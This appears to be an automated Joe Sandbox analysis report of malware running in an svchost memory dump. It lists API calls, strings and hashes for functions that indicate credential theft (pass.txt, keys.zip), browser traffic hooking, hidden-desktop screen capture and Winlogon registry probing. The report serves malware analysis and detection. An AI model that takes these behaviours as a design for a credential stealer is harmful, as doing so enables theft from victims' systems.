GetHandleInformation.KERNEL32(00000000,?), ref: 02D43101
CloseHandle.KERNEL32(00000000), ref: 02D4310F
CreateThread.KERNEL32(00000000,00000000,02D42F60,00000000,00000000,00000000), ref: 02D43124
Sleep.KERNEL32(00009C40), ref: 02D43135
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D4313A
GetHandleInformation.KERNEL32(00000000,?), ref: 02D4314E
CloseHandle.KERNEL32(00000000), ref: 02D4315C
PathAddBackslashA.SHLWAPI(02D7CF94), ref: 02D43167
Sleep.KERNEL32(00009C40,02D7CF94,RSTYLE), ref: 02D43181
Sleep.KERNEL32(00000064), ref: 02D4318A

Strings

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D430D0
RSTYLE, xrefs: 02D4316D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$RSTYLE
API String ID: 505831200-1477618600
Opcode ID: 1713e1c3508da5d04130f8afdda7f605b752c4f668a40ba02caf66bee6a69a07
Instruction ID: bfbc3e9643aa727bb0b6e3781f151b877f1f36f6bdc33099e81d53aaf1832c31
Opcode Fuzzy Hash: 1713e1c3508da5d04130f8afdda7f605b752c4f668a40ba02caf66bee6a69a07
Instruction Fuzzy Hash: 8011CE30A893127FF36157A8AC0EF1E37949F04B15F244648F946A13C0DFB49C198AB6

Function 02D381F0 Relevance: 22.6, APIs: 15, Instructions: 149fileCOMMON

Download Yara Rule

APIs

fseek.MSVCRT ref: 02D38236
fwrite.MSVCRT ref: 02D38245
fseek.MSVCRT ref: 02D3825B
fread.MSVCRT ref: 02D38268
fseek.MSVCRT ref: 02D382F2
fwrite.MSVCRT ref: 02D382FF
fclose.MSVCRT ref: 02D38307

Part of subcall function 02D37CD0: fseek.MSVCRT ref: 02D37D5B
Part of subcall function 02D37CD0: fwrite.MSVCRT ref: 02D37D72
Part of subcall function 02D37CD0: fwrite.MSVCRT ref: 02D37D81
Part of subcall function 02D37CD0: fwrite.MSVCRT ref: 02D37DA1

free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38320
free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38326
free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D3832C
free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38332
free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D3833B
free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38341
free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38344
free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,02D43EB4), ref: 02D38353

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: free$fwrite$fseek$fclosefread
String ID:
API String ID: 2434908339-0
Opcode ID: a382a2cbded399acc1535aeeda628329cf6b6aa88cfcdc33c6a5eb0f54ccdbfa
Instruction ID: 34572de42659f1172303ea220c028d02f52f53afa1be30f60bce8cc97270a9f0
Opcode Fuzzy Hash: a382a2cbded399acc1535aeeda628329cf6b6aa88cfcdc33c6a5eb0f54ccdbfa
Instruction Fuzzy Hash: 4641B1716407059BD720DBA8CC85B6AB3E9FF98710F288A2DF595C7791C278F844CB61

Function 02D2E8C0 Relevance: 21.4, APIs: 7, Strings: 7, Instructions: 411COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D2E8D4
StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02D2F73F,?,?), ref: 02D2E935
StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02D2F73F,?,?), ref: 02D2E9F1
memcpy.MSVCRT ref: 02D2EB33
memcpy.MSVCRT ref: 02D2EBEE
memcpy.MSVCRT ref: 02D2EBFF
memcpy.MSVCRT ref: 02D2EC31

Strings

Content-Length, xrefs: 02D2EAED
Content-Type, xrefs: 02D2EC9D
http://, xrefs: 02D2EB80
https://, xrefs: 02D2EBC2, 02D2EBEC
NSS layer, xrefs: 02D2EBA1
Host, xrefs: 02D2EAB0
Referer, xrefs: 02D2EC48

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memcpy$memset
String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
API String ID: 438689982-3158524741
Opcode ID: 6a83ebfc51efe0bbf131daee254ea609798161d1bea71a98a0811e88b1c09742
Instruction ID: 034b666143971b281d117d2e7e48d6792f6c765cbc254a345b52d2fc4d94eb51
Opcode Fuzzy Hash: 6a83ebfc51efe0bbf131daee254ea609798161d1bea71a98a0811e88b1c09742
Instruction Fuzzy Hash: 86D1F471E002765BEF318F58C8847EEB7A6AB6531CF48565AD845B7340D730BC49CBA1

Function 02D30140 Relevance: 21.1, APIs: 14, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D3016B
HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D3016E
GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D3017B
HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D3017E
GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02D3043D,00000001), ref: 02D30197
CloseHandle.KERNEL32(?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301A8
GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D301B8
HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301BB
GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D301C8
HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301CB
GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D301DB
HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301DE
GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D301EB
HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301EE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidate$Handle$CloseInformation
String ID:
API String ID: 2935687291-0
Opcode ID: 2e4fd2d02f021029f217e39c1d414f68985e1159ca62b275ebed3bf504d10df9
Instruction ID: 7176f689e37a5023560fb6d1ad6659e2af967092e3b527c04adef249582d5183
Opcode Fuzzy Hash: 2e4fd2d02f021029f217e39c1d414f68985e1159ca62b275ebed3bf504d10df9
Instruction Fuzzy Hash: 59319A71A462106BDBA19F61F98CB6B7B9CEF45766F548515ED08DB340CB70CC90CAB0

Function 02D44B30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 82memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,00000000,00000101,?), ref: 02D44B60
GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D44B79
HeapAlloc.KERNEL32(00000000), ref: 02D44B7C
memset.MSVCRT ref: 02D44B90
RegQueryValueExA.ADVAPI32(?,Shell,00000000,00000001,00000000,00000104), ref: 02D44BB0
RegCloseKey.ADVAPI32(?), ref: 02D44BC0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D44BD1
HeapValidate.KERNEL32(00000000), ref: 02D44BD4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D44BE1
HeapFree.KERNEL32(00000000), ref: 02D44BE4

Strings

Shell, xrefs: 02D44BAA
Software\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 02D44B45

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocCloseFreeOpenQueryValidateValuememset
String ID: Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon
API String ID: 2162099866-2454539505
Opcode ID: b0ddad1992f7528aea9cf4791a8e572147d696c7b554d13b54c495cc121e5da7
Instruction ID: cce0189e9e8a116377b195425a434b052e5809ae2d7eb88eaf32e86273e03ec2
Opcode Fuzzy Hash: b0ddad1992f7528aea9cf4791a8e572147d696c7b554d13b54c495cc121e5da7
Instruction Fuzzy Hash: DA21A175E812147BEB209AA4AC4DFAFBBACEB44B55F100545F908E7340DAB19D9086E0

Function 02D26070 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D26070
DnsFlushResolverCache.DNSAPI ref: 02D2607A
LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75B07390), ref: 02D2608A
GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02D260A3
GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02D260BF
GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02D260DB
GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02D260F7

Strings

DnsQuery_W, xrefs: 02D260D5
Query_Main, xrefs: 02D260F1
DnsQuery_UTF8, xrefs: 02D260B9
Dnsapi.dll, xrefs: 02D26085
DnsQuery_A, xrefs: 02D2609D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
API String ID: 2466897691-3547598143
Opcode ID: 2e1d65df4df408259518bb1ca7d0842137d9b0d537f76930e9514d07f7f0dff0
Instruction ID: 3a9edd419d99d3725e30f616e10728e1dba83055580459d46e24e4633c74489b
Opcode Fuzzy Hash: 2e1d65df4df408259518bb1ca7d0842137d9b0d537f76930e9514d07f7f0dff0
Instruction Fuzzy Hash: 96014F32B8132632B92136B27E0EF6B270D5F64E48BA40110F903B1345DE9CEC8D88B9

Function 02D2D850 Relevance: 19.6, APIs: 13, Instructions: 113filesynchronizationmemoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02D2D858
HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D869

Part of subcall function 02D2D7A0: GetComputerNameA.KERNEL32(02D6F588,?), ref: 02D2D7B7
Part of subcall function 02D2D7A0: lstrlenA.KERNEL32(02D6F588,?,?,?,02D3714F), ref: 02D2D7C2
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D802
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D812
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D822
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D82F
Part of subcall function 02D2D7A0: wsprintfA.USER32 ref: 02D2D83C

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02D6F5A0), ref: 02D2D893
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D8AC

Part of subcall function 02D28D30: SetThreadDesktop.USER32(?,74DEF590,74DE16B0,00000000), ref: 02D28D3F
Part of subcall function 02D28D30: GetDC.USER32(00000000), ref: 02D28D47
Part of subcall function 02D28D30: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02D28D58
Part of subcall function 02D28D30: GetDeviceCaps.GDI32(00000000,00000008), ref: 02D28D69
Part of subcall function 02D28D30: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02D28D80
Part of subcall function 02D28D30: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02D28DC2
Part of subcall function 02D28D30: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02D28DD2
Part of subcall function 02D28D30: DeleteObject.GDI32(00000000), ref: 02D28DD5
Part of subcall function 02D28D30: ReleaseDC.USER32(00000000,00000000), ref: 02D28DDE
Part of subcall function 02D28D30: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D28E39

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02D6F54C), ref: 02D2D8D9
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D8EC
CreateMutexA.KERNEL32(00000000,00000000,02D6F670,?,?,02D27F92,00000000,00000000), ref: 02D2D90A
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D91B
CreateMutexA.KERNEL32(00000000,00000000,02D6F630,?,?,02D27F92,00000000,00000000), ref: 02D2D92F
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D948
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D95B
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02D27F92,00000000,00000000), ref: 02D2D96E
CreateEventA.KERNEL32(00000000,00000000,00000000,02D6F5DC,?,?,02D27F92,00000000,00000000), ref: 02D2D984

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Create$wsprintf$EventFile$Mutex$BitsCapsDeviceHeapMappingView$BitmapCompatibleComputerCountDeleteDesktopFreeNameObjectReleaseThreadTicklstrlen
String ID:
API String ID: 2940656088-0
Opcode ID: 3846ea25153a711f94934a99c540495bee00549762989f1ea578e28196a22e56
Instruction ID: c9c7aa44b599956466c7b1176f9db4f70037568202d99190649bb06ccfea8e6e
Opcode Fuzzy Hash: 3846ea25153a711f94934a99c540495bee00549762989f1ea578e28196a22e56
Instruction Fuzzy Hash: 47311871BC83227AF7205F69AC0AF552B996714B14F244816F705FA3C0EBE0AC148E68

Function 02D409E0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5E8DC3C1,?,75BFBF00), ref: 02D40A10
CreateDirectoryA.KERNEL32(?,00000000,?,75BFBF00), ref: 02D40A51
GetLastError.KERNEL32(?,75BFBF00), ref: 02D40A5B
IsUserAnAdmin.SHELL32 ref: 02D40A63
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D40A74
SetLastError.KERNEL32(00000000,?,75BFBF00), ref: 02D40A7B
SetCurrentDirectoryA.KERNEL32(?,?,75BFBF00), ref: 02D40A88
PathAddBackslashA.SHLWAPI(5E8DC3C1,?,?,?,75BFBF00), ref: 02D40AF7

Strings

path1.txt, xrefs: 02D40B38
keys.zip, xrefs: 02D40AA8
5E8DC3C1, xrefs: 02D40A0B, 02D40A12, 02D40AF2, 02D40AF9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
String ID: 5E8DC3C1$keys.zip$path1.txt
API String ID: 1373881290-3976757129
Opcode ID: ff827ced13e28ad59f9f9762fd5f0a4b548c68c99be5730b1e974a8f864940c6
Instruction ID: a75023bc085c02853d5a799870944f20ff0edf10b31c048d2cc70a2df6268de6
Opcode Fuzzy Hash: ff827ced13e28ad59f9f9762fd5f0a4b548c68c99be5730b1e974a8f864940c6
Instruction Fuzzy Hash: BF4116716046555FCB25CB34A868AE77BE4EF95301F148595DACAC7300EF71DD84CBA0

Function 02D43A00 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 121threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43A40
PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43A7D
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D43A92
GetLastError.KERNEL32 ref: 02D43A9C
IsUserAnAdmin.SHELL32 ref: 02D43AA4
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D43AB5
SetLastError.KERNEL32(00000000), ref: 02D43ABC
CreateThread.KERNEL32(00000000,00000000,02D43B90,00000000,00000000,00000000), ref: 02D43B25
GetHandleInformation.KERNEL32(00000000,?), ref: 02D43B3D
CloseHandle.KERNEL32(00000000), ref: 02D43B4E

Strings

pass.txt, xrefs: 02D43AD8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashCreateErrorHandleLast$AdminCloseDirectoryFolderInformationMakeSystemThreadUser
String ID: pass.txt
API String ID: 3876079015-1961669250
Opcode ID: 83aedc28b06de81be35d4c47587df1d1df104de39a41f94ac032c12bfbb81a89
Instruction ID: af9812f7b849a2774b2bc10d67cf896b361420b31bc11bd8956dba0c0cb9b0be
Opcode Fuzzy Hash: 83aedc28b06de81be35d4c47587df1d1df104de39a41f94ac032c12bfbb81a89
Instruction Fuzzy Hash: 48410131A482559BDB20DF68E858BEA7BA9EF09304F2444D4ECC697340DF70DD98CBA0

Function 02D43A17 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 116threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43A40
PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D43A7D
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D43A92
GetLastError.KERNEL32 ref: 02D43A9C
IsUserAnAdmin.SHELL32 ref: 02D43AA4
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D43AB5
SetLastError.KERNEL32(00000000), ref: 02D43ABC
CreateThread.KERNEL32(00000000,00000000,02D43B90,00000000,00000000,00000000), ref: 02D43B25
GetHandleInformation.KERNEL32(00000000,?), ref: 02D43B3D
CloseHandle.KERNEL32(00000000), ref: 02D43B4E

Strings

pass.txt, xrefs: 02D43AD8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashCreateErrorHandleLast$AdminCloseDirectoryFolderInformationMakeSystemThreadUser
String ID: pass.txt
API String ID: 3876079015-1961669250
Opcode ID: 29d6508a6258cbc3071a8eaba09a0ef0d68a4e3cd639a385daf7943b684c915c
Instruction ID: e9d665087977ba4c9a46b5fccfb8145d1278e3297d3b4323c1cfb5b601b03bac
Opcode Fuzzy Hash: 29d6508a6258cbc3071a8eaba09a0ef0d68a4e3cd639a385daf7943b684c915c
Instruction Fuzzy Hash: D7410031A442559BDB20DF68E858BEA7BA9EF49304F2484C4EC86D7340DF70DD98CB60

Function 02D26A50 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D26A81
memset.MSVCRT ref: 02D26A9F
RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02D26ABB
RegQueryValueExA.ADVAPI32(?,A1633BD9a,00000000,00000001,?,00000104), ref: 02D26AE2
GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02D26B5A
HeapAlloc.KERNEL32(00000000), ref: 02D26B61
memset.MSVCRT ref: 02D26B75
lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02D26B8E
RegCloseKey.ADVAPI32(?), ref: 02D26B9C

Strings

A1633BD9a, xrefs: 02D26ADC
software\microsoft, xrefs: 02D26AB1

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
String ID: A1633BD9a$software\microsoft
API String ID: 217510255-1581879137
Opcode ID: 0da08ca20a8b89c130d7454ea7b61035c1784b79d7e75350bf467c9d9a07e8db
Instruction ID: 8099477aa10b2384a37f51e8f7d52aa03864a54077b9ec8bb0146c1d198320ae
Opcode Fuzzy Hash: 0da08ca20a8b89c130d7454ea7b61035c1784b79d7e75350bf467c9d9a07e8db
Instruction Fuzzy Hash: 2F31D571D412286AEB25DB649C4DFEE7B6CEF18708F000499E509E2241D7B4CE88CBE1

Function 02D268F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D26921
memset.MSVCRT ref: 02D2693F
RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02D2695A
RegQueryValueExA.ADVAPI32(80000001,A1633BD9a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02D26981
GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02D269FA
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02D26A01
memset.MSVCRT ref: 02D26A15
lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02D26A2E
RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02D26A3C

Strings

A1633BD9a, xrefs: 02D2697B
software\microsoft, xrefs: 02D26954

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
String ID: A1633BD9a$software\microsoft
API String ID: 217510255-1581879137
Opcode ID: ad4aa954e845d7de822cee9dfce66a34a70f8d47829392cddc8dcd5297b09b51
Instruction ID: 2199c11016dbe96afc3bbdc40abfda2891da2b0845cd9d080720724f81e74b90
Opcode Fuzzy Hash: ad4aa954e845d7de822cee9dfce66a34a70f8d47829392cddc8dcd5297b09b51
Instruction Fuzzy Hash: C931A571D4122866DB25DB649C4DBEE7B6CEF18B08F404499E549E6240D7B4CE88CBE1

Function 02D41869 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90threadCOMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D418CD
GetLastError.KERNEL32 ref: 02D418D7
IsUserAnAdmin.SHELL32 ref: 02D418DF
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D418F0
SetLastError.KERNEL32(00000000), ref: 02D418F7
SetCurrentDirectoryA.KERNEL32(?), ref: 02D41904
CreateThread.KERNEL32(00000000,00000000,02D41AE0,00000000,00000000,00000000), ref: 02D4194A
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D41962
CloseHandle.KERNEL32(00000000), ref: 02D41973

Strings

5E8DC3D7, xrefs: 02D41882
pass.txt, xrefs: 02D4191D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryErrorHandleLast$AdminCloseCurrentFolderInformationMakePathSystemThreadUser
String ID: 5E8DC3D7$pass.txt
API String ID: 1033491162-1244847135
Opcode ID: cf1bba6caecc68467a6cd8cbdf2e50e47534c4e502dc3d56739922157214d357
Instruction ID: 5fdc03794af89acf5972de7f03774dd2a12cedd704f9a1b98bdc3964cadb7da7
Opcode Fuzzy Hash: cf1bba6caecc68467a6cd8cbdf2e50e47534c4e502dc3d56739922157214d357
Instruction Fuzzy Hash: 7631C531A40215ABDB218B64A81C7EB7BA8EF45341F548694E88997340EFB0DDD8CBE0

Function 02D23940 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02D23951
GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D368DD), ref: 02D23964
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D23970
GetTickCount.KERNEL32 ref: 02D2399D
GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D368DD), ref: 02D239AA
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D239B6
_snprintf.MSVCRT ref: 02D239E9

Strings

3eaeb407628e78f, xrefs: 02D239E4
ntdll.dll, xrefs: 02D2395F, 02D239A5
%x%x, xrefs: 02D239DA
RtlUniform, xrefs: 02D2396A, 02D239B0

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
